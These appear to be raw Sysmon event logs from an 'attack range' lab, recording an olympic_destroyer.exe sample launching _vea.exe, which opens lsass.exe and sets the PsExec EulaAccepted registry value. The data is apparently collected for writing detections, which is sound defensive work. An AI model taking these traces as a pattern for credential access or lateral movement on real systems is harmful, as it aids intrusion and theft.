10:57:40.301{C8EA50B7-1323-6216-5F06-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000293330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:40.285{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1323-6216-5F06-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:40.285{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1323-6216-5F06-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:40.270{C8EA50B7-1323-6216-5F06-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000293327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:40.216{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1324-6216-6006-000000003802}6636C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:40.216{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1324-6216-6006-000000003802}6636C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:40.185{C8EA50B7-1324-6216-6006-000000003802}66366544C:\Windows\system32\conhost.exe{C8EA50B7-1323-6216-5F06-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:40.101{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1324-6216-6006-000000003802}6636C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:40.085{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1324-6216-6006-000000003802}6636C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:40.001{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.985{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.985{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.985{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.985{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.969{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1001079F9024D15F3D7D63B1923E231C,SHA256=B2B12B0B76289968665D12123FF80899ECB0892483EA2E8BA859B7239C338BC8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.954{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1323-6216-5F06-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.938{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1323-6216-5F06-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x8000000000000000217824Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:37.683{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51421-false10.0.1.12-8000- 23542300x8000000000000000217826Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:41.627{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7C37719F554C6D00201294CE78C8162,SHA256=AFE61D61C1B5A11CC328B474E51936E080E8C6295A7BACE3C51423E6116AEFD8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:39.443{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53784-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 10341000x8000000000000000293334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:41.153{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:41.000{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EBD7CF91EB80D34BCD383DFB9446450,SHA256=2AB35729E8488D536A4897017218B4D57F90AB85548579C85D66AB4DFDEEE89D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217827Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:42.737{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3786D1E7E80510131DBA3A6FBD378EC,SHA256=0FD066C2BA7F3C00578A47D0362E0FEA47D82925C320A090D549DB8F01A2B0F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:42.168{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=118015E8F266E1E478072AED2ACA76FC,SHA256=B08F3D5992CC411FDC859A61916181725CA6DADCF265226CF42AC8D414553695,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:42.015{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370DFCF7328356271615116057F11B4F,SHA256=F4B2CFF798571B40DB71FE4F490EE65738A1666F66D5E33F8FE22456765FD3FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217828Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:43.816{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B42768627DC982131D712D0849D8CB7B,SHA256=01BEC39B811B28ADF219C762F5CB3CA0869D70EB0DA4A26D1975E49DED5001D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:43.035{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EEEAD8225D526B06CC775BB7991E228,SHA256=C989AFC7C54CE3DE4BEF22648F86A169504B02727AC0678D7A23A8A04D1164A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217842Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.879{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1328-6216-8A04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217841Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.879{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217840Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.879{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217839Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.879{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217838Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.879{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217837Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.879{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217836Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:44.879{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217835Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 